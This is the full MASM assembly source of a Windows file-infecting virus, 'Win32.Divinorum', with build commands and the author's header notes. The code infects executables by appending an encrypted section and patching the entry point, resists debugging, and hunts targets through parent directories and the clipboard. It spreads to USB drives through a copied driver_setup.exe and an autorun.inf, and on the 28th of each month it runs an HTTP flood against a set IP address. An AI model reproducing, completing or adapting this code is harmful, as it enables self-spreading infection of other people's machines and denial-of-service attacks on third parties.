Berniee / EOF
;Virus name :Divinorum (Final Release) ;Coded by :Berniee(aka fakedminded)-------EOF.PROJECT ;Date :05/10/2007(1st release) ,01/01/08(Final release) ;Method.ofInf:Appending by adding new section ;EPO :overwriting the first bytes with decrypting loop ;Polymorphism: No ;Worming :Usb Flash disk dropping ;Description :The virus is an appender type of virii,infects all files in the current directory ; goes up dir three times,and then loops in a clpboard capture and flash worming func ; the virus payloads every 28th of anymonth a message with DoS ; The virus rename the infected victim sections into UPX(x)! ; First run the virus only infects a "sample.exe" ; MSIL PE file will be excluded in the infection. ; ; The virus is not intended to hurt anyone so dont fuck people with it ; ;Notes :This is not the same copy the AVers has informed of. ;To build it either use PEWRSEC tool after assembling the file ;or use the following commands to assemble ;ml /c /Cp /coff divinorum.asm ;link /subsystem:windows /section:.text,wre divinorum.obj ;For any bugs contact me thru: fakedminded[ate]cooltoad[dont]com ; or ::--further info .486 .model flat,stdcall option casemap:none include \masm32\include\ include vir_size=offset end__ -offset start _sub =offset @4-offset start intiative equ <mov eax,[ebp+offset stack_mem]> .code start: call @f ;Start of antidebugging/delta offset routine jmp get_delta @@: assume fs:nothing mov eax,[esp] push eax push fs:[0] mov fs:[0],esp xor eax,eax mov eax,[eax] ret get_delta: mov eax,[esp+12] mov esp,[eax+184+12] pop fs:[0] pop edx pop ebp sub ebp,offset @b add ebp,2h or ebp,ebp jz @4 _enc: jmp @f decrypt_value dd 0ffffffffh ;every new breed changeable value sub_key db 0,0 @@: mov edi,esp ;--------------------------- add edi,28h ; \ mov ebx,edi ; | lea esi,[ebp+offset decryptor] ; | mov ecx,size_d rep movsb ; Decr ; ypti ; ng R @@: ; outi xor eax,eax ; e mov eax,[ebx] ; Inst ; alle xchg ah,al ; d in ror eax,16 ; Stac xchg ah,al ; k bl ror eax,16 ; ock. mov dword ptr [ebx],eax add ebx,4 add ecx,4 cmp ecx,size_d jae @f lea edx,[ebp+offset @b] push edx ret @@: lea esi,[ebp+offset @4] mov ecx,vir_size- _sub+4 jmp @f decryptor db 0F9h,83h, 7Eh,00h ,31h,0eh ,03h,06h ,0D1h,0c2h ,83h,0c8h ,08h,0c6h ,0E9h,83h ,0EBh,08h, 0c3h,0EDh size_d = $-decryptor @@: xor edx,edx ; | mov eax,dword ptr [ebp+offset decrypt_value]; | mov dx,word ptr [ebp+offset sub_key] sub ebx,size_d ; / call ebx ;----------------------------- @4: jmp @f CopyLeft db "Win32.Divinorum",13,10,"Code By Fakedminded/EOF-Project",13,10,"Mikko cut ur ponytail!",0 cur_ep dd 0 victims db "*.exe",0 HFile dd 0 prev_entry dd 0 image_base dd 00400000h ;only for the first run ;) buffer_clpboard dd 0 w32fdata WIN32_FIND_DATA<0> @@: xor ebx,ebx mov ebx,esp mov ecx,esp sub ecx,1000h mov dword ptr [ebp+offset stack_mem],ecx call get_kernel call find_main_api sub [ebp+offset decrypt_value],0 mov ecx,0ffffh call rnd_ push eax mov ecx,0ffffh call rnd_ pop ecx ror eax,16 xor eax,ecx cmp eax,0 jg @f not eax mov [ebp+offset decrypt_value],eax push eax mov ecx,0ffffh call rnd_ push eax mov ecx,0ffffh call rnd_ pop edx xor eax,edx mov word ptr[ebp+sub_key],ax @@: or ebp,ebp jz @f mov edi,[ebp+offset prev_entry] add edi,[ebp+image_base] push edi lea esi,[ebp+offset original_bytes] mov ecx,(size666+8) rep movsb pop edi or ebp,ebp jz @f mov edx,esp sub edx,24 push edx xor eax,eax push eax push eax push edi push eax push eax intiative call ACreateThread @@: mov eax,[stack_mem+ebp] mov eax,AGetProcAddress mov eax,[eax] cmp eax,000200C8h jz exit call paytime ;---> a postponed project or ebp,ebp jnz x_n_run call @f db "sample.exe",0 ;first run infect sample.exe @@: pop edx call adding_section jmp _1st_run x_n_run: call dir_up ;infect directories by going up 3 times call capture_clpboard exit1: @@: exit_32: push -1 intiative call ASleep _1st_run: intiative call AExitProcess exit: ret ;//////////////////dir up 3 times dir_up: push 256 push 0 intiative call AGlobalAlloc mov edx,eax push eax push edx push 256 intiative call AGetCurrentDirectoryA mov edx,[esp] cmp word ptr [edx+3],"NIW" jne @f cmp word ptr [edx+3],"niw" jne @f pop edx ret @@: mov ecx,3 bad_luck: push ecx call nfkt_dir call @f db "..",0 @@: intiative call ASetCurrentDirectoryA pop ecx loop bad_luck intiative call ASetCurrentDirectoryA ret ;//////////////////here it will check tha infected proggy has the capability of net connection in its apis check_sock: mov esi,[ebp+image_base] add esi,[esi+3ch] mov ecx,[esi+84h] mov esi,[esi+80h] or esi,esi jz failed_ add esi,[ebp+image_base] @@: mov edi,[esi+0ch] add edi,[ebp+image_base] cmp dword ptr[edi],'COSW' jz @f cmp dword ptr[edi],'cosw' jz @f cmp dword ptr[edi],'_2sw' jz @f cmp dword ptr[edi],'_2SW' jz @f add esi,14h sub ecx,13h loop @b failed_: xor eax,eax ret @@: mov eax,-1 ret ;///////////////////nfkt directory procedure//////// nfkt_dir: lea eax,[ebp+offset w32fdata] push eax lea eax,[ebp+offset victims] push eax mov eax,[ebp+stack_mem] call AFindFirstFileA cmp eax,INVALID_HANDLE_VALUE jz exit42 mov [ebp+offset HFile],eax or eax,eax jz exit42 lea edx,[ebp+offset w32fdata.cFileName] call adding_section @find: mov ecx,overall_size call hold_stack lea eax,[ebp+offset w32fdata] push eax push [ebp+offset HFile] intiative call AFindNextFileA mov ecx,overall_size call return_stack mov eax,fs:[18h] ;replacing GetLastError(),since it bugged me on XP! mov eax,[eax+34h] cmp eax,ERROR_NO_MORE_FILES jz exit52 lea edx,[ebp+offset w32fdata.cFileName] call adding_section jmp @find exit52: push [ebp+offset HFile] intiative;mov eax,[ebp+offset stack_mem] call AFindClose exit42: ret ;///////////////////getting kernel base///////////// get_kernel: jmp this_code kernel_base dd 0 this_code: mov ecx,[esp+4] loop_find_kernel: xor edx,edx dec ecx mov dx,[ecx+3ch] test dx,0f800h jnz loop_find_kernel cmp ecx,[ecx+edx+34h] jnz loop_find_kernel cmp word ptr [ecx],"ZM" jne loop_find_kernel mov dword ptr [ebp+offset kernel_base],ecx lrrt: ret ;/////////////////end getting kernel base/////////////// find_main_api: jmp finder_data k32_crc: CreateFileAF dd 0553b5c78h CloseHandleF dd 0b09315f4h WriteFileF dd 0cce95612h ReadFileF dd 095c03d0h GetFileSizeF dd 0a7fb4165h GlobalAllocF dd 07fbc7431h SetFilePointerF dd 0efc7ea74h GetProcAddressF dd 0c97c1fffh GetVersionExAF dd 0df87764ah GetDateFormatAF dd 03b15c34bh SleepF dd 0cef2eda8h FindFirstFileAF dd 0c9ebd5ceh FindNextFileAF dd 075272948h FindCloseF dd 0d82bf69ah GetLastErrorF dd 0d2e536b7h ExitProcessF dd 0251097cch LoadLibraryAF dd 03fc1bd8dh FreeLibraryF dd 0da68238fh ExpandEnvironmentStringsAF dd 0a6bab89ch GetModuleHandleAF dd 0b1866570h GetModuleFileNameAF dd 08bff7a0h CopyFileAF dd 0199dc99h GetCurrentDirectoryAF dd 0c79dc4e3h SetCurrentDirectoryAF dd 069b6849fh GetFileAttributesAF dd 030601c1ch GetTickCountF dd 05b4219f8h CreateThreadF dd 0906a06b0h IsDebuggerPresentF dd 08436f795h CreateMutexAF dd 0d9ac2453h GetLogicalDriveStringsAF dd 054216660h GetDriveTypeAF dd 0f6a56750h VirtualProtectF dd 010066f2fh GetEnvironmentVariableAF dd 02f87d308h CreateProcessAF dd 0a851d916h WaitForSingleObjectF dd 0e058bb45h dd 0 k32_crc_size = $-k32_crc-4 ws_32_crc: WSACleanupF dd 08e3398bch WSAStartupF dd 0a0f5fc93h WSASocketAF dd 0cb14bd82h htonsF dd 0fac416e8h htonlF dd 077cc1b1dh connectF dd 074cff91fh acceptF dd 0b320ed34h listenF dd 0c22467fdh recvF dd 059d852adh sendF dd 0a7733acdh bindF dd 046ccf353h inet_addrF dd 05308a87eh dd 0 ws_32_crc_size = $-ws_32_crc-4 shell32: DragQueryFileAF dd 0732cfac6h dd 0 shell32_size = $-shell32-4 user32: OpenClipboardF dd 0b44ddfcah CloseClipboardF dd 099c1926ch GetClipboardDataF dd 01dcbd147h MessageBoxAF dd 0572d5d8eh dd 0 user32_size =$-user32-4 overall_size=user32_size+shell32_size+ws_32_crc_size+k32_crc_size h_drop dd 0 PE_offset dd 0 Export_address dd 0 Export_size dd 0 Current_kern dd 0 function_no dd 0 function_addr dd 0 function_ord dd 0 function_name dd 0 base_ord dd 0 dll_base dd 0 stack_mem dd 0 crc_function dd 0 stack_pointer dd 0 old_mem_protect dd 0 saved_stack dd 0 finder_data: lea edx,[ebp+offset k32_crc] mov edi,[ebp+offset kernel_base] mov ecx,[ebp+offset stack_mem] call find_apiz push (ws_32_crc_size+k32_crc_size+user32_size+shell32_size+300) push 0 intiative call AGlobalAlloc mov [ebp+offset saved_stack],eax mov ecx,k32_crc_size mov edi,eax mov esi,[ebp+offset stack_mem] call save_stack ;LoadLibrary() fornicate the stack! call @f ;finding user32_apiz:--test db "ws2_32.dll",0 @@: mov eax,[ebp+stack_mem] call ALoadLibraryA push eax mov ecx,k32_crc_size mov edi,[ebp+offset stack_mem] mov esi,[ebp+offset saved_stack] call save_stack pop eax lea edx,[ebp+offset ws_32_crc] mov edi,eax mov ecx,[ebp+offset stack_mem] add ecx,k32_crc_size call find_apiz mov ecx,k32_crc_size+ws_32_crc_size call hold_stack ;LoadLibrary() fornicate the stack! call @f db "shell32.dll",0 @@: mov eax,[ebp+stack_mem] call ALoadLibraryA push eax mov ecx,k32_crc_size+ws_32_crc_size call return_stack pop eax lea edx,[ebp+offset shell32] mov edi,eax mov ecx,[ebp+offset stack_mem] add ecx,k32_crc_size+ws_32_crc_size call find_apiz mov ecx,k32_crc_size+ws_32_crc_size+shell32_size call hold_stack ;LoadLibrary() fornicate the stack! call @f db "user32.dll",0 @@: mov eax,[ebp+stack_mem] call ALoadLibraryA push eax mov ecx,k32_crc_size+ws_32_crc_size+shell32_size call return_stack pop eax lea edx,[ebp+offset user32] mov edi,eax mov ecx,[ebp+offset stack_mem] add ecx,k32_crc_size+ws_32_crc_size+shell32_size call find_apiz ret save_stack: @@: lodsd stosd sub ecx,3 loop @b ret ;------------------------------------------------------------------------; ; finding apis of different kinds of modules ; ;________________________________________________________________________; ;edx=pointer to crc functions,edi=address of the module,ecx=offset from stack_mem find_apiz: mov [ebp+offset stack_pointer],ecx mov [ebp+crc_function],edx mov [ebp+offset dll_base],edi add edi,[edi+3ch] ;just checking cmp word ptr [edi],"EP" jne exit mov dword ptr [ebp+offset PE_offset],edi mov eax,[edi+78h] ;export table rva push eax mov eax,[edi+7ch] ;export table size mov [ebp+offset Export_size],eax pop eax mov [ebp+offset Export_address],eax add eax,[ebp+offset dll_base] mov edx,[eax+16] ; ordinal base add edx,[ebp+offset dll_base] mov [ebp+offset base_ord],edx mov edx,[eax+24] ;no. of exported functions mov [ebp+offset function_no],edx mov edx,[eax+28] ;rva of exported functions add edx,[ebp+offset dll_base] mov [ebp+offset function_addr],edx mov edx,[eax+32] ; rva of exported function name add edx,[ebp+offset dll_base] mov [ebp+offset function_name],edx mov edx,[eax+36] ;rva for name ordinal add edx,[ebp+offset dll_base] mov [ebp+offset function_ord],edx xor edx,edx xor eax,eax xor ecx,ecx mov esi,[ebp+crc_function] loop_beauty: lodsd cmp eax,0h je end_serch_api xchg eax,ebx push esi push ecx xor ecx,ecx mov esi,[ebp+offset function_name] @@: lodsd add eax,[ebp+offset dll_base] push ecx push esi push ebx xchg eax,esi call size_string call crc_ pop ebx pop esi pop ecx cmp ebx,eax jz Got_it inc ecx cmp ecx,[ebp+offset function_no] jna @b Got_it: shl ecx,1 mov eax,[ebp+offset function_ord] add eax,ecx xor ecx,ecx mov cx,word ptr [eax] shl ecx,2 mov eax,[ebp+offset function_addr] add eax,ecx mov eax,[eax] add eax,[ebp+offset dll_base] pop ecx mov ebx,ecx add ebx,[ebp+offset stack_pointer]; [ebp+stack_mem] mov [ebx],eax add ecx,4 pop esi jmp loop_beauty ;mov [ebp+offset AGetProcAddressF],eax end_serch_api: ret exit_finder: mov eax,0 ret vir_size=offset end__ -offset start _sub =offset @4-offset start decrypt666: mov ebp,esp sldt word ptr [ebx+8] xor edx,edx mov edx,dword ptr [ebx+8] or edx,edx jz lick_69 mov ebx,_sub @@: sub dword ptr [eax],3 add eax,4 sub ebx,4 cmp ebx,0 jg @b add esp,4 jmp dword ptr [ebp] ; call @f ; push 0c3h ; @@: ; pop edx ; jmp $-5 ; ret lick_69: ret size666 equ $ - decrypt666 ;/////////////////////adding new section at the end of file ;/////////////////// adding_section: ;file infection procedure by adding new section jmp code_ v_handle dd 0 v_size dd 0 v_mem dd 0 sec_align dd 0 file_align dd 0 add_ed dd 0 bwr dd 0 cur_pe dd 0 v_size_aligned dd 0 virtual_address dd 0 physical_address dd 0 vir_enc_mem dd 0 lstsec_physical_offset dd 0 lstsec_virtual_address dd 0 ep_in_sec dd 0 original_bytes db (size666+8) dup(0) delta_section dd 0 code_: push 0 push 0 push 3 push 0 push FILE_SHARE_READ or FILE_SHARE_WRITE push 40000000h or 80000000h mov eax,edx push eax mov eax,dword ptr[ebp+stack_mem] call ACreateFileA mov dword ptr [ebp+offset v_handle],eax push 0 push dword ptr [ebp+offset v_handle] mov eax,dword ptr[ebp+stack_mem] call AGetFileSize mov dword ptr [ebp+offset v_size],eax push dword ptr [ebp+offset v_size] push 0 mov eax,dword ptr[ebp+stack_mem] call dword ptr AGlobalAlloc or eax,eax jz err_sec mov dword ptr [ebp+offset v_mem],eax push 0 mov eax,offset bwr add eax,ebp push eax push dword ptr [ebp+offset v_size] push dword ptr [ebp+offset v_mem] push dword ptr [ebp+offset v_handle] mov eax,dword ptr[ebp+stack_mem] call AReadFile ;--->completed reading the file to the v_mem mov eax, dword ptr [ebp+offset v_mem] ;start to check for MSIL shit mov ecx, dword ptr [ebp+offset v_size] @@: cmp word ptr [eax],"ocsm" je err_sec inc eax loop @b mov edx,dword ptr [ebp+offset v_mem] cmp word ptr [edx],'ZM' jne err_sec add edx,dword ptr [edx+3ch] ;---->I've got to PE!e cmp word ptr [edx],'EP' jne err_sec mov eax, dword ptr [edx+52] mov dword ptr [ebp+offset image_base],eax ;---->Image base save it mov eax, dword ptr [edx+40] mov dword ptr [ebp+offset prev_entry],eax ;---->so as the entry point xor ecx,ecx mov cx,word ptr [edx+6h] inc word ptr [edx+6h] ;sec. numbers=old+1(our new section) mov eax,dword ptr [edx+60] mov [ebp+offset file_align],eax mov eax,dword ptr [edx+56] ;-->section alignment usually 1000 mov [ebp+offset sec_align],eax mov ebx,eax mov eax,vir_size ;---->managing the image size call align__ add dword ptr [edx+80],eax push edx xor eax,eax mov ax,word ptr [edx+14h] ;--->getting the optional header size add ax,24 ;--->adding 24(offset of optional header from PE) to get into sections' headers add edx,eax mov dword ptr [ebp+offset cur_pe],edx ;saving 'pe' offset call change_section_names mov eax,[edx+20] mov dword ptr [ebp+lstsec_physical_offset],eax call find_1stsec mov dword ptr [eax+36],0c0000040h mov dword ptr [ebp+offset ep_in_sec],eax xor eax,eax xor edx,edx mov eax,28h ;--->getting the last section's header mul cx mov edx,[ebp+offset cur_pe] add edx,eax sub edx,28h ;substtract 28h (sec. header size) to get the beginning of the last header data mov eax,dword ptr [edx+0ch] ;--->virtual address of previous section add eax,dword ptr [edx+08h] ;--->virtual size of previous section cmp eax,dword ptr [edx+0ch] ;--->detect if virtual size is zero?!! jnz @f pop ecx jmp err_sec @@: mov ebx,[ebp+offset sec_align] ;--->align them for the new added section virtual address call align__ mov dword ptr [ebp+offset virtual_address],eax ;--->of the new section mov eax,dword ptr[edx+20] ;----->pointer of the physical raw data in prev. section add eax,dword ptr[edx+16] ;----->physical size of prev. section mov ebx,[ebp+offset file_align] ;--->align according to file aligner call align__ mov dword ptr [ebp+offset physical_address],eax continue__: add edx,28h ;--->going to add our section mov ecx,28h loop_grant: ;--->checking out if there is any space there for adding our section cmp dword ptr [edx],0 ;--alot of ecxeptions jne err_all inc edx loop loop_grant sub edx,50h add edx,28h mov ebx,'0XPU' mov dword ptr [edx],ebx ;------>section's name(randomized) mov eax,vir_size mov ebx,[ebp+offset file_align] ;---->section's v. size call align__ mov dword ptr [edx+8],eax ;-------> section's v. size push dword ptr [ebp+offset virtual_address] ;-----> section v.address pop dword ptr [edx+12] mov eax,[edx+12] mov dword ptr [ebp+offset add_ed],eax mov dword ptr [edx+16],vir_size ;----->raw size of the new section push dword ptr [ebp+offset physical_address] ;---->physical address of our new section pop dword ptr [edx+20] mov dword ptr [edx+36],0c0000040h ;read and write characteristics of the new section add edx,28h fill_gap: cmp byte ptr[edx],0 jnz @f mov byte ptr [edx],-1 inc edx loop fill_gap @@: pop edx ;--returning our old pointer to pe mov eax,dword ptr [ebp+offset physical_address] ;now after the popping, ;checking if there is some extra in the end add eax,10000 ;let go some situation ;) cmp [ebp+offset v_size],eax jg err_sec add dword ptr [edx+01ch],vir_size push FILE_BEGIN push 0 push 0 push dword ptr [ebp+offset v_handle] intiative call ASetFilePointer push 0 mov eax,offset bwr add eax,ebp push eax push dword ptr [ebp+offset v_size] push dword ptr [ebp+offset v_mem] push dword ptr [ebp+offset v_handle] intiative call AWriteFile ;writing back victim's body mov eax,[ebp+offset add_ed] mov eax,[ebp+offset ep_in_sec] push eax mov eax,[eax+0ch] mov ebx,[ebp+prev_entry] sub ebx,eax mov [ebp+delta_section],ebx pop eax mov eax,[eax+20] add eax,[ebp+delta_section] pusha push FILE_BEGIN push 0 push eax push dword ptr [ebp+offset v_handle] mov eax,dword ptr[ebp+stack_mem] call ASetFilePointer popa mov esi,[ebp+offset v_mem] ;epo routine add esi,eax mov ecx,(size666+8) push esi lea edi,[ebp+offset original_bytes] rep movsb pop esi mov byte ptr [esi],0b8h mov eax, [ebp+offset add_ed] add eax,[ebp+image_base] mov dword ptr[esi+1],eax mov byte ptr [esi+5],50h mov edi,esi push esi add edi,6 lea esi,[ebp+offset decrypt666] mov ecx,size666 rep movsb pop esi push 0 mov eax,offset bwr add eax,ebp push eax push (size666+8) push esi push dword ptr [ebp+offset v_handle] intiative call AWriteFile ;writing back victim's body push FILE_BEGIN push 0 push 0 push dword ptr [ebp+offset v_handle] intiative call ASetFilePointer push FILE_END push 0 push 0 push dword ptr [ebp+offset v_handle] intiative call ASetFilePointer push vir_size push 0 intiative call AGlobalAlloc mov dword ptr [ebp+offset vir_enc_mem],eax mov edi,dword ptr [ebp+offset vir_enc_mem] mov esi,offset start add esi,ebp mov ecx,vir_size rep movsb mov edi,dword ptr [ebp+offset vir_enc_mem] mov esi,edi mov ecx,_sub @@: add dword ptr [esi],3 add esi,4 sub ecx,4 cmp ecx,0 jg @b add edi,_sub push edx xor eax,eax mov eax,dword ptr[ebp+offset decrypt_value] xor edx,edx mov dx,word ptr [ebp+offset sub_key] mov ecx,vir_size- _sub @@: xor dword ptr [edi],eax add eax,edx ror eax,1h add edi,8 sub ecx,8 cmp ecx,0 jg @b pop edx push 0 mov eax,offset bwr add eax,ebp push eax push vir_size push dword ptr [ebp+offset vir_enc_mem] push dword ptr [ebp+offset v_handle] intiative call AWriteFile ;----> write our virus to the end of file push dword ptr [ebp+offset v_handle] intiative call ACloseHandle ret err_sec: push dword ptr [ebp+offset v_handle] intiative call ACloseHandle ret err_all: push dword ptr [ebp+offset v_handle] intiative call ACloseHandle pop edx ret find_1stsec: push ebx push edx mov ebx,dword ptr [ebp+prev_entry] @ddd: xor eax,eax mov eax,[edx+0ch] ;V.Address compare with the entry point! cmp eax,ebx jle @f add edx,28h jmp @ddd @@: add eax,[edx+10h];size of raw data cmp eax,ebx jg found_pointer add edx,28h jmp @ddd found_pointer: xchg eax,edx pop edx pop ebx findsectL: ret change_section_names: push edx push ecx xor eax,eax mov eax,'1' @@: mov dword ptr[edx],'XPU' mov dword ptr[edx+3],eax inc eax add edx,40 loop @b pop ecx pop edx ret align__: push edx xor edx, edx div ebx or edx, edx jz no_round_up inc eax no_round_up: mul ebx pop edx ret paytime: ;a dos attack on certain ips.. jmp @f buftime dd 0 @@: push 100 push 0 intiative call AGlobalAlloc mov [ebp+buftime],eax push 256 push [ebp+buftime] call @f db "dd",0 @@: xor eax,eax push eax push eax push eax intiative call AGetDateFormatA mov eax,[ebp+offset buftime] cmp word ptr [eax],'82' jne @f xor eax,eax push eax push [ebp+offset buftime] lea edx,[ebp+offset CopyLeft] push edx push eax intiative call AMessageBoxA call payload_ @@: ret payload_: jmp @f ip_victime db "",0 header db "GET / HTTP/1.1",13,10,"",13,10,"Connection:Keep-Alive",13,10,13,10,0 size_header = $-header @@: mov ecx,sizeof sockaddr_in lea esi,[ebp+sock_addr] call zero_mem lea eax,[ebp+offset ws] push eax push 001h mov eax,[stack_mem+ebp] call AWSAStartup mov ecx,k32_crc_size+ws_32_crc_size call hold_stack xor eax,eax push eax push eax push eax push IPPROTO_TCP push SOCK_STREAM push AF_INET intiative call AWSASocketA cmp eax,INVALID_SOCKET jz exit_shell mov [ebp+socket_],eax mov ecx,k32_crc_size+ws_32_crc_size call return_stack mov [ebp+sock_addr.sin_family],AF_INET push 80 intiative call Ahtons mov word ptr [ebp+sock_addr.sin_port],ax lea eax,[ebp+offset ip_victime] push eax intiative call Ainet_addr mov [ebp+sock_addr.sin_addr.S_un.S_addr],eax push sizeof sock_addr lea eax,[ebp+offset sock_addr] push eax push [ebp+offset socket_] intiative call Aconnect @@: push 0 push size_header lea eax,[ebp+header] push eax push [ebp+offset socket_] intiative call Asend push 1000 intiative call ASleep loop @b ret exit_shell: ret ws WSADATA <0> sock_addr sockaddr_in<0> socket_ dd 0 current_dir dd 0 capture_clpboard: ;search for clipboard for any pe files or folders to infect(readonly will not bee infected!) push 512 push 0 intiative call AGlobalAlloc mov dword ptr [ebp+offset buffer_clpboard],eax push 512 push 0 intiative call AGlobalAlloc mov dword ptr [ebp+offset current_dir],eax jmp @f buffer_dropper dd 0 module_name dd 0 buffer dd 0 @@: push 512 push 0 intiative call AGlobalAlloc mov [ebp+offset buffer],eax push 512 push 0 intiative call AGlobalAlloc mov [ebp+offset buffer_dropper],eax push 512 push 0 intiative call AGlobalAlloc mov [ebp+offset module_name],eax _label1: call drop_flash push 0 intiative call AOpenClipboard push CF_HDROP intiative call AGetClipboardData or eax,eax jz _sleepClp mov [ebp+offset h_drop],eax push 0 push 0 push 0FFFFFFFFh push eax intiative call ADragQueryFileA or eax,eax jz _sleepClp mov ecx,eax _getFiles: push ecx push 512 push [ebp+offset buffer_clpboard] dec ecx push ecx push [ebp+offset h_drop] intiative call ADragQueryFileA push [ebp+offset buffer_clpboard] intiative call AGetFileAttributesA cmp eax,FILE_ATTRIBUTE_READONLY je see_next cmp eax,FILE_ATTRIBUTE_DIRECTORY je @f call conver_2_folder @@: push [ebp+offset current_dir] push 512 intiative call AGetCurrentDirectoryA push [ebp+offset buffer_clpboard] intiative call ASetCurrentDirectoryA call dir_up;nfkt_dir push [ebp+offset current_dir] intiative call ASetCurrentDirectoryA jmp see_next see_next: pop ecx call _sleepClp _sleepClp: intiative call ACloseClipboard mov esi,[ebp+offset buffer_clpboard] mov ecx,512 call zero_mem push 7000 intiative call ASleep jmp _label1 exit_clpboard: ret conver_2_folder: mov esi,[ebp+offset buffer_clpboard] call size_string add esi,ecx dec esi @@: cmp byte ptr[esi],'\' je @f mov byte ptr[esi],0 dec esi jmp @b @@: ret ;//////// file_content db "[autorun]",13,10,"open=driver_setup.exe",13,10,0 file_name2 db "autorun.inf",0 file_name db "driver_setup.exe",0 drop_flash: ;this will drop the infected file into any new attached removavle except floppy drives mov ecx,overall_size call hold_stack push 512 push [ebp+offset module_name] push 0 intiative call AGetModuleFileNameA mov ecx,overall_size call return_stack search_driver: push [ebp+offset buffer_dropper] push 512 intiative call AGetLogicalDriveStringsA mov edx,[ebp+offset buffer_dropper] _rumble: push edx cmp byte ptr [edx],"A" je seek_nother push edx intiative call AGetDriveTypeA cmp eax,DRIVE_REMOVABLE jne seek_nother mov esi,[ebp+offset buffer] mov ecx,256 call zero_mem mov ecx,overall_size call hold_stack pop edx push edx mov esi,edx mov edi,[ebp+offset buffer] mov ecx,3 rep movsb mov edi,[ebp+offset buffer] add edi,3 mov esi,offset file_name add esi,ebp mov ecx,sizeof file_name rep movsb push FALSE push [ebp+offset buffer] push [ebp+offset module_name] intiative call ACopyFileA mov ecx,overall_size call return_stack push 100 intiative call ASleep pop edx push edx mov esi,[ebp+offset buffer] mov ecx,256 call zero_mem mov esi,edx mov edi,[ebp+offset buffer] mov ecx,3 rep movsb lea esi,[ebp+offset file_name2] mov ecx,sizeof file_name2 rep movsb xor eax,eax push eax push eax push 2 push eax push eax push 40000000h push [ebp+offset buffer] intiative call ACreateFileA push eax push 0 mov edx,esp push 0 push edx push sizeof file_content lea edx,[ebp+offset file_content] push edx push eax intiative call AWriteFile pop ebx intiative call ACloseHandle seek_nother: pop edx add edx,4 cmp byte ptr [edx+1],0 je sleep_baby jmp _rumble sleep_baby: push 2000 intiative call ASleep mov esi,[ebp+offset buffer_dropper] mov ecx,512 call zero_mem ret ;//////////////////////esi=text ;//////////////////////ecx=sizeof text ;//////////////////////returning eax=CRC32 of that text ;////////////////////Original code by Sepultura. ,re-styled by me :) crc_: xor edx,edx dec edx @0: lodsb xor dl,al push ecx push 8 pop ecx ;silmaril note ;) @1: shr edx,1 jnc @f xor edx,0EDB88320h @@: loop @1 pop ecx loop @0 not edx xchg edx,eax ret ;---------------------Some Accessory function I use ;//////////////size string esi=offset sring,ecx=the result size_string: push esi xor ecx,ecx loop_size: cmp byte ptr [esi],0 je sized inc esi inc ecx jmp loop_size sized: pop esi ret rnd_: inc ecx push ecx mov eax,[ebp+stack_mem] call AGetTickCount add eax,1234h pop ecx @2: push ecx xor edx,edx div ecx xchg edx,eax pop ecx cmp eax,ecx ja @2 cmp eax,0 ja @w xchg eax,edx jmp @2 @w: ret return_stack: mov esi,[ebp+offset saved_stack] mov edi,[ebp+offset stack_mem] call save_stack ret hold_stack: mov edi,[ebp+offset saved_stack] mov esi,[ebp+offset stack_mem] call save_stack ret zero_mem: mov byte ptr [esi],0 inc esi loop zero_mem ret lstrct: search_zero: cmp byte ptr [edi],0 je found_zero inc edi jmp search_zero found_zero: rep movsb ret end__: end start ;end of story!